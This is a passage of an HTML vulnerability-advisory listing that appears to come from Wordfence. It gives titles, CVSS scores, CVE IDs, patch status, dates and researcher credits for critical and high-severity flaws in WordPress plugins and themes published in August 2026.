<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66613" target="_blank" rel="noopener noreferrer">							CVE-2026-66613						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-engine" target="_blank" rel="noopener">JetEngine</a> <span class="wfvr-software-slug">[jet-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74e00d27-1462-4225-b205-da4c2e480de3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c601f75-3ee2-47ed-8d67-67fac4403a5d" target="_blank" rel="noopener">JSON Options &lt;= 0.0.4 &#8211; Unauthenticated Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75860" target="_blank" rel="noopener noreferrer">							CVE-2026-75860						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/json-options" target="_blank" rel="noopener">JSON Options</a> <span class="wfvr-software-slug">[json-options]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dacc17a271a6378d63177b8dbe4c6a05.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dacc17a271a6378d63177b8dbe4c6a05"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi-2" target="_blank" rel="noopener">Khaled Alenazi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c601f75-3ee2-47ed-8d67-67fac4403a5d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/110e888d-69fc-4682-b908-2b62288c5227" target="_blank" rel="noopener">Mailgun for WordPress &lt;= 2.2.0 &#8211; Unauthenticated Server-Side Request Forgery (SSRF) via &#8216;addresses&#8217; Array Keys</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78003" target="_blank" rel="noopener noreferrer">							CVE-2026-78003						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailgun" target="_blank" rel="noopener">Mailgun for WordPress</a> <span class="wfvr-software-slug">[mailgun]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/110e888d-69fc-4682-b908-2b62288c5227" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87d6322c-3031-47c7-a1ad-2ce805e58755" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates &lt;= 2.3.2 &#8211; Unauthenticated Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73996" target="_blank" rel="noopener noreferrer">							CVE-2026-73996						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</a> <span class="wfvr-software-slug">[learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/20kilograma" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/355ce104d8d84334b00aeb894b98d99d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="355ce104d8d84334b00aeb894b98d99d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/20kilograma" target="_blank" rel="noopener">20kilograma</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87d6322c-3031-47c7-a1ad-2ce805e58755" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b343269f-35f2-4cba-b539-3a4d8fd4baf4" target="_blank" rel="noopener">ShopMonitor.io – Automated Checkout &amp; Form Monitoring &lt; 1.2.0 &#8211; Unauthenticated Privilege Escalation via Account Takeover</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14919" target="_blank" rel="noopener noreferrer">							CVE-2026-14919						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shopmonitorio" target="_blank" rel="noopener">ShopMonitor.io – Automated Checkout &amp; Form Monitoring</a> <span class="wfvr-software-slug">[shopmonitorio]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b343269f-35f2-4cba-b539-3a4d8fd4baf4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fa910b80-a496-449c-8227-de7defa1f2ae" target="_blank" rel="noopener">Total Donations &lt;= 2.0.5 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78570" target="_blank" rel="noopener noreferrer">							CVE-2026-78570						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/totaldonations" target="_blank" rel="noopener">Total Donations</a> <span class="wfvr-software-slug">[totaldonations]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fa910b80-a496-449c-8227-de7defa1f2ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c3ecf70-544f-49c1-a943-86df89685b58" target="_blank" rel="noopener">Total Donations &lt;= 2.0.5 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78568" target="_blank" rel="noopener noreferrer">							CVE-2026-78568						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/totaldonations" target="_blank" rel="noopener">Total Donations</a> <span class="wfvr-software-slug">[totaldonations]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c3ecf70-544f-49c1-a943-86df89685b58" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73251a74-5be3-446b-8e0a-ff2d1484c467" target="_blank" rel="noopener">TrueBooker &lt;= 1.2.6 &#8211; Unauthenticated Authorization Bypass Through User-Controlled Key to Account Takeover to &#8216;truebooker_wp_user_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18315" target="_blank" rel="noopener noreferrer">							CVE-2026-18315						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/decio-brandao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/aa489aa91597949de7508433fc432ec6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aa489aa91597949de7508433fc432ec6"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/decio-brandao" target="_blank" rel="noopener">Décio Brandão</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73251a74-5be3-446b-8e0a-ff2d1484c467" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49a34919-94bc-4369-a0c1-e34d7563116d" target="_blank" rel="noopener">User Registration PRO – Custom Registration Form, Login Form, and User Profile WordPress Plugin &lt;= 5.4.5 &#8211; Unauthenticated Privilege Escalation via Account Takeover</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74001" target="_blank" rel="noopener noreferrer">							CVE-2026-74001						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration-pro" target="_blank" rel="noopener">User Registration PRO – Custom Registration Form, Login Form, and User Profile WordPress Plugin</a> <span class="wfvr-software-slug">[user-registration-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49a34919-94bc-4369-a0c1-e34d7563116d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5a0612de-0f85-44d3-9b81-1a6a7720a03a" target="_blank" rel="noopener">WP Compress – Instant Performance &amp; Speed Optimization &lt; 7.20.01 &#8211; Unauthenticated Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73343" target="_blank" rel="noopener noreferrer">							CVE-2026-73343						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-compress-image-optimizer" target="_blank" rel="noopener">WP Compress – Instant Performance &amp; Speed Optimization</a> <span class="wfvr-software-slug">[wp-compress-image-optimizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5a0612de-0f85-44d3-9b81-1a6a7720a03a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df36eae9-6f2b-432c-a765-57450939b344" target="_blank" rel="noopener">WS Form LITE &lt;= 1.10.80 &#8211; Unauthenticated PHP Object Injection via Form Submission</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4703" target="_blank" rel="noopener noreferrer">							CVE-2026-4703						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ws-form" target="_blank" rel="noopener">WS Form LITE – Drag &amp; Drop Contact Form Builder</a> <span class="wfvr-software-slug">[ws-form]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df36eae9-6f2b-432c-a765-57450939b344" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85f89f95-43df-4177-aaac-27d494eaff69" target="_blank" rel="noopener">GP Premium &lt;= 2.5.5 &#8211; Authenticated (Contributor+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66627" target="_blank" rel="noopener noreferrer">							CVE-2026-66627						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gp-premium" target="_blank" rel="noopener">GP Premium</a> <span class="wfvr-software-slug">[gp-premium]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85f89f95-43df-4177-aaac-27d494eaff69" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/729dacbf-47ad-4c4b-b7a6-fcd6304f97cc" target="_blank" rel="noopener">IT Residence &lt;= 3.2.1 &#8211; Authenticated (Subscriber+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74014" target="_blank" rel="noopener noreferrer">							CVE-2026-74014						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/it-residence" target="_blank" rel="noopener">IT Residence</a> <span class="wfvr-software-slug">[it-residence]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denver-jackson-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/34e8630d9d966b9be2ef1801165bedf1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="34e8630d9d966b9be2ef1801165bedf1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denver-jackson-2" target="_blank" rel="noopener">Denver Jackson</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/729dacbf-47ad-4c4b-b7a6-fcd6304f97cc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0db18319-6552-42f1-b304-aca61780c12c" target="_blank" rel="noopener">Media Library Assistant &lt;= 3.39 &#8211; Authenticated (Author+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66600" target="_blank" rel="noopener noreferrer">							CVE-2026-66600						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-library-assistant" target="_blank" rel="noopener">Media Library Assistant</a> <span class="wfvr-software-slug">[media-library-assistant]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0db18319-6552-42f1-b304-aca61780c12c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8f53282-740e-4ac3-a2e1-7a97893e3355" target="_blank" rel="noopener">PPWP – Password Protect Pages &lt;= 1.9.18 &#8211; Authenticated (Contributor+) PHP Object Injection via post_protection_roles</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
